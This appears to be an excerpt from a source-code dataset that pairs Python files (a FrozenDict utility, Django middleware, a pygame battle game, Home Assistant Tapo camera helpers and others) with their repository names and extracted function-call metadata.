__slots__ = ('_dict', '_hash')
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
self._hash = None
def __getitem__(self, key):
v = self._dict[key]
if isinstance(v, dict):
return FrozenDict(v)
return v
def __setitem__(self, key, value):
raise ValueError('FrozenDict is immutable.')
def __contains__(self, key):
return key in self._dict
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return 'FrozenDict(%r)' % self._dict
def __hash__(self):
if self._hash is None:
h = 0
for key, value in self.items():
h ^= hash((key, value))
self._hash = h
return self._hash
def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]':
"""Create a new FrozenDict with additional or replaced entries."""
return type(self)(self, **unfreeze(add_or_replace))
def items(self):
for key in self._dict:
yield (key, self[key])
def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]:
"""Create a new FrozenDict where one entry is removed.
Example::
state, params = variables.pop('params')
Args:
key: the key to remove from the dict
Returns:
A pair with the new FrozenDict and the removed value.
"""
value = self[key]
new_dict = dict(self._dict)
new_dict.pop(key)
new_self = type(self)(new_dict)
return new_self, value
def unfreeze(self) -> Dict[K, V]:
return unfreeze(self)
def tree_flatten(self):
return (self._dict,), ()
@classmethod
def tree_unflatten(cls, _, data):
return cls(*data)
def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]:
"""Freeze a nested dict.
Makes a nested `dict` immutable by transforming it into `FrozenDict`.
"""
# Turn the nested FrozenDict into a dict. This way the internal data structure
# of FrozenDict does not contain any FrozenDicts.
# instead we create those lazily in `__getitem__`.
# As a result tree_flatten/unflatten will be fast
# because it operates on native dicts.
xs = unfreeze(xs)
return FrozenDict(xs)
def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]:
"""Unfreeze a FrozenDict.
  Makes a mutable copy of a `FrozenDict` by transforming
  it into a (nested) dict.
"""
if not isinstance(x, (FrozenDict, dict)):
return x
ys = {}
for key, value in x.items():
ys[key] = unfreeze(value)
return ys
def _frozen_dict_state_dict(xs):
return {key: serialization.to_state_dict(value) for key, value in xs.items()}
def _restore_frozen_dict(xs, states):
return freeze(
{key: serialization.from_state_dict(value, states[key])
for key, value in xs.items()})
serialization.register_serialization_state(
FrozenDict,
_frozen_dict_state_dict,
_restore_frozen_dict)
| [((23, 4, 23, 16), 'typing.TypeVar', 'TypeVar', ({(23, 12, 23, 15): '"""K"""'}, {}), "('K')", False, 'from typing import TypeVar, Mapping, Dict, Tuple\n'), ((24, 4, 24, 16), 'typing.TypeVar', 'TypeVar', ({(24, 12, 24, 15): '"""V"""'}, {}), "('V')", False, 'from typing import TypeVar, Mapping, Dict, Tuple\n'), ((140, 0, 143, 25), 'flax.serialization.register_serialization_state', 'serialization.register_serialization_state', ({(141, 4, 141, 14): 'FrozenDict', (142, 4, 142, 27): '_frozen_dict_state_dict', (143, 4, 143, 24): '_restore_frozen_dict'}, {}), '(FrozenDict,\n _frozen_dict_state_dict, _restore_frozen_dict)', False, 'from flax import serialization\n'), ((131, 15, 131, 49), 'flax.serialization.to_state_dict', 'serialization.to_state_dict', ({(131, 43, 131, 48): 'value'}, {}), '(value)', False, 'from flax import serialization\n'), ((136, 12, 136, 61), 'flax.serialization.from_state_dict', 'serialization.from_state_dict', ({(136, 42, 136, 47): 'value', (136, 49, 136, 60): 'states[key]'}, {}), '(value, states[key])', False, 'from flax import serialization\n')] |
grigi/pybbm | pybb/middleware.py | 9ecc5e7fadf4da820d2fc2c22914e14f3545047d | # -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
                # and grant permissions to add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| [((24, 23, 24, 69), 'django.utils.translation.get_language_from_request', 'translation.get_language_from_request', ({(24, 61, 24, 68): 'request'}, {}), '(request)', False, 'from django.utils import translation\n'), ((17, 26, 17, 61), 'pybb.util.get_pybb_profile', 'util.get_pybb_profile', ({(17, 48, 17, 60): 'request.user'}, {}), '(request.user)', False, 'from pybb import util\n'), ((32, 16, 32, 54), 'django.utils.translation.activate', 'translation.activate', ({(32, 37, 32, 53): 'profile.language'}, {}), '(profile.language)', False, 'from django.utils import translation\n'), ((33, 40, 33, 66), 'django.utils.translation.get_language', 'translation.get_language', ({}, {}), '()', False, 'from django.utils import translation\n'), ((21, 16, 21, 54), 'pybb.signals.user_saved', 'user_saved', (), '', False, 'from pybb.signals import user_saved\n'), ((22, 26, 22, 61), 'pybb.util.get_pybb_profile', 'util.get_pybb_profile', ({(22, 48, 22, 60): 'request.user'}, {}), '(request.user)', False, 'from pybb import util\n')] |
s0h3ck/streetlite | streetlite/common/constants.py | 21db388702f828417dd3dc0fbfa5af757216e1e0 | from enum import Enum
class CustomEnum(Enum):
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
@classmethod
def from_value(cls, value):
found_element = None
if cls.has_value(value):
found_element = cls(value)
return found_element
class Direction(CustomEnum):
EAST = 0x1
SOUTH = 0x2
WEST = 0x3
NORTH = 0x4
class Action(CustomEnum):
FLASH_RED = 0x32
GREEN = 0x33
FLASH_GREEN = 0x34
PEDESTRIAN = 0x35
EMERGENCY = 0x37
class Intersection(CustomEnum):
A = 0x62
B = 0x61
BOTH = 0x63
class Mode(CustomEnum):
LIVE = 0
SIMULATION = 1 | [] |
achien/advent-of-code-2021 | day5.py | 8851e1727975ea8124db78b54fe577fbf2e5883d | import fileinput
counts = {}
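# Each input line has the form "x1,y1 -> x2,y2"; count how many segments cover each grid point.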
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
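  # Walk from (x1, y1) to (x2, y2) one step at a time, tallying every visited point.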
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
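# Count the grid points covered by two or more segments.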
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n) | [((4, 12, 4, 29), 'fileinput.input', 'fileinput.input', ({}, {}), '()', False, 'import fileinput\n')] |
sodapopinsky/dfk | meditation_example.py | be48e89d4b054ad8abbb009d0e1ea4c10f559af5 | import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| [((11, 13, 11, 48), 'logging.getLogger', 'logging.getLogger', ({(11, 31, 11, 47): '"""DFK-meditation"""'}, {}), "('DFK-meditation')", False, 'import logging\n'), ((13, 4, 13, 81), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((24, 25, 24, 87), 'meditation.meditation.get_active_meditations', 'meditation.get_active_meditations', ({(24, 59, 24, 74): 'account_address', (24, 76, 24, 86): 'rpc_server'}, {}), '(account_address, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((29, 21, 29, 69), 'meditation.meditation.get_required_runes', 'meditation.get_required_runes', ({(29, 51, 29, 56): 'level', (29, 58, 29, 68): 'rpc_server'}, {}), '(level, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((33, 22, 33, 73), 'meditation.meditation.get_hero_meditation', 'meditation.get_hero_meditation', ({(33, 53, 33, 60): 'hero_id', (33, 62, 33, 72): 'rpc_server'}, {}), '(hero_id, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((35, 4, 35, 17), 'time.sleep', 'time.sleep', ({(35, 15, 35, 16): '(5)'}, {}), '(5)', False, 'import time\n'), ((22, 14, 22, 43), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(22, 32, 22, 42): 'rpc_server'}, {}), '(rpc_server)', False, 'from web3 import Web3\n'), ((30, 35, 30, 65), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 54, 30, 64): '"""strength"""'}, {}), "('strength')", True, 'import meditation.meditation as meditation\n'), ((30, 67, 30, 98), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 86, 30, 97): '"""endurance"""'}, {}), "('endurance')", True, 'import meditation.meditation as meditation\n'), ((30, 100, 30, 126), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 119, 30, 125): '"""luck"""'}, {}), "('luck')", True, 'import meditation.meditation as meditation\n')] |
JohnStarich/dotfiles | python/johnstarich/interval.py | eaa07b09aa02fc2fa2516cebdd3628b4daf506e4 | import time
class Interval(object):
def __init__(self, delay_time: int):
self.delay_time = delay_time
self.current_time = 0
@staticmethod
def now():
return time.gmtime().tm_sec
def should_run(self) -> bool:
if self.current_time == 0:
self.current_time = Interval.now()
return True
return self.is_done()
def is_done(self) -> bool:
timestamp = Interval.now()
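        # now() returns the second within the current minute (0-59), so the interval is also
        # considered done once the seconds counter wraps past the recorded start time.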
return self.current_time + self.delay_time < timestamp or \
self.current_time > timestamp
def start(self) -> int:
self.current_time = Interval.now()
return self.current_time
| [((11, 15, 11, 28), 'time.gmtime', 'time.gmtime', ({}, {}), '()', False, 'import time\n')] |
opencoweb/coweb | servers/python/coweb/bot/wrapper/object.py | 7b3a87ee9eda735a859447d404ee16edde1c5671 | '''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
        '''Sends a public reply to subscribers on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
| [((15, 6, 15, 36), 'logging.getLogger', 'logging.getLogger', ({(15, 24, 15, 35): '"""coweb.bot"""'}, {}), "('coweb.bot')", False, 'import logging\n'), ((22, 24, 22, 46), 'weakref.proxy', 'weakref.proxy', ({(22, 38, 22, 45): 'manager'}, {}), '(manager)', False, 'import weakref\n'), ((55, 12, 55, 56), 'functools.partial', 'functools.partial', ({(55, 30, 55, 38): 'callback', (55, 40, 55, 45): '*args'}, {}), '(callback, *args, **kwargs)', False, 'import functools\n'), ((60, 12, 60, 56), 'functools.partial', 'functools.partial', ({(60, 30, 60, 38): 'callback', (60, 40, 60, 45): '*args'}, {}), '(callback, *args, **kwargs)', False, 'import functools\n'), ((61, 40, 61, 51), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
lankotiAditya/RPG_battle_main | battle_tut5.py | 0063941d023ff1c18a6b050fab4d0c7ec583b11a | import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
#set variables to attack animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| [((4, 0, 4, 13), 'pygame.init', 'pygame.init', ({}, {}), '()', False, 'import pygame\n'), ((6, 8, 6, 27), 'pygame.time.Clock', 'pygame.time.Clock', ({}, {}), '()', False, 'import pygame\n'), ((14, 9, 14, 63), 'pygame.display.set_mode', 'pygame.display.set_mode', ({(14, 33, 14, 62): '(screen_width, screen_height)'}, {}), '((screen_width, screen_height))', False, 'import pygame\n'), ((15, 0, 15, 36), 'pygame.display.set_caption', 'pygame.display.set_caption', ({(15, 27, 15, 35): '"""Battle"""'}, {}), "('Battle')", False, 'import pygame\n'), ((29, 7, 29, 49), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(29, 27, 29, 44): '"""Times New Roman"""', (29, 46, 29, 48): '26'}, {}), "('Times New Roman', 26)", False, 'import pygame\n'), ((257, 0, 257, 13), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((203, 1, 203, 31), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', ({(203, 26, 203, 30): '(True)'}, {}), '(True)', False, 'import pygame\n'), ((204, 7, 204, 29), 'pygame.mouse.get_pos', 'pygame.mouse.get_pos', ({}, {}), '()', False, 'import pygame\n'), ((247, 14, 247, 32), 'pygame.event.get', 'pygame.event.get', ({}, {}), '()', False, 'import pygame\n'), ((255, 1, 255, 24), 'pygame.display.update', 'pygame.display.update', ({}, {}), '()', False, 'import pygame\n'), ((37, 17, 37, 67), 'pygame.image.load', 'pygame.image.load', ({(37, 35, 37, 66): '"""img/Background/background.png"""'}, {}), "('img/Background/background.png')", False, 'import pygame\n'), ((39, 12, 39, 52), 'pygame.image.load', 'pygame.image.load', ({(39, 30, 39, 51): '"""img/Icons/panel.png"""'}, {}), "('img/Icons/panel.png')", False, 'import pygame\n'), ((41, 12, 41, 52), 'pygame.image.load', 'pygame.image.load', ({(41, 30, 41, 51): '"""img/Icons/sword.png"""'}, {}), "('img/Icons/sword.png')", False, 'import pygame\n'), ((81, 21, 81, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((120, 21, 120, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((125, 9, 125, 30), 'random.randint', 'random.randint', ({(125, 24, 125, 26): '-5', (125, 28, 125, 29): '5'}, {}), '(-5, 5)', False, 'import random\n'), ((135, 21, 135, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((156, 2, 156, 58), 'pygame.draw.rect', 'pygame.draw.rect', ({(156, 19, 156, 25): 'screen', (156, 27, 156, 30): 'red', (156, 32, 156, 57): '(self.x, self.y, 150, 20)'}, {}), '(screen, red, (self.x, self.y, 150, 20))', False, 'import pygame\n'), ((157, 2, 157, 68), 'pygame.draw.rect', 'pygame.draw.rect', ({(157, 19, 157, 25): 'screen', (157, 27, 157, 32): 'green', (157, 34, 157, 67): '(self.x, self.y, 150 * ratio, 20)'}, {}), '(screen, green, (self.x, self.y, 150 * ratio, 20))', False, 'import pygame\n'), ((85, 9, 85, 59), 'pygame.image.load', 'pygame.image.load', ({(85, 27, 85, 58): 'f"""img/{self.name}/Idle/{i}.png"""'}, {}), "(f'img/{self.name}/Idle/{i}.png')", False, 'import pygame\n'), ((92, 9, 92, 61), 'pygame.image.load', 'pygame.image.load', ({(92, 27, 92, 60): 'f"""img/{self.name}/Attack/{i}.png"""'}, {}), "(f'img/{self.name}/Attack/{i}.png')", False, 'import pygame\n'), ((108, 22, 108, 45), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((208, 3, 208, 34), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', ({(208, 28, 208, 33): '(False)'}, {}), '(False)', False, 'import pygame\n'), ((107, 5, 107, 28), 'pygame.time.get_ticks', 
'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n')] |
marinaoliveira96/python-exercises | curso_em_video/0087a.py | 13fc0ec30dec9bb6531cdeb41c80726971975835 | matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'The sum of the even numbers is {soma}')
print(f'The sum of the values in the 3rd column is {col3}')
print(f'The largest number in the 2nd row is {maior}') | []
david-kalbermatten/HomeAssistant-Tapo-Control | custom_components/tapo_control/utils.py | 3f9f8316cf7e176bb6f8d798d709f3c6d346a527 | import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
def registerController(host, username, password):
return Tapo(host, username, password)
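# Example sketch (assumed usage, not part of the integration): the controller is
# a plain pytapo client, so outside Home Assistant it can be exercised directly.
# Host and credentials below are placeholders.
#
#   controller = registerController("192.168.0.10", "admin", "camera-password")
#   print(controller.getBasicInfo())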
async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""
async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False
async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData
async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)
async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)
async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
| [((15, 11, 15, 41), 'pytapo.Tapo', 'Tapo', ({(15, 16, 15, 20): 'host', (15, 22, 15, 30): 'username', (15, 32, 15, 40): 'password'}, {}), '(host, username, password)', False, 'from pytapo import Tapo\n'), ((20, 13, 20, 55), 'haffmpeg.tools.ImageFrame', 'ImageFrame', (), '', False, 'from haffmpeg.tools import IMAGE_JPEG, ImageFrame\n'), ((169, 54, 173, 9), 'homeassistant.components.onvif.event.EventManager', 'EventManager', ({(170, 12, 170, 16): 'hass', (171, 12, 171, 61): "hass.data[DOMAIN][entry.entry_id]['eventsDevice']", (172, 12, 172, 43): 'f"""{entry.entry_id}_tapo_events"""'}, {}), "(hass, hass.data[DOMAIN][entry.entry_id]['eventsDevice'],\n f'{entry.entry_id}_tapo_events')", False, 'from homeassistant.components.onvif.event import EventManager\n'), ((39, 11, 39, 42), 'os.path.dirname', 'os.path.dirname', ({(39, 27, 39, 41): 'onvif.__file__'}, {}), '(onvif.__file__)', False, 'import os\n')] |
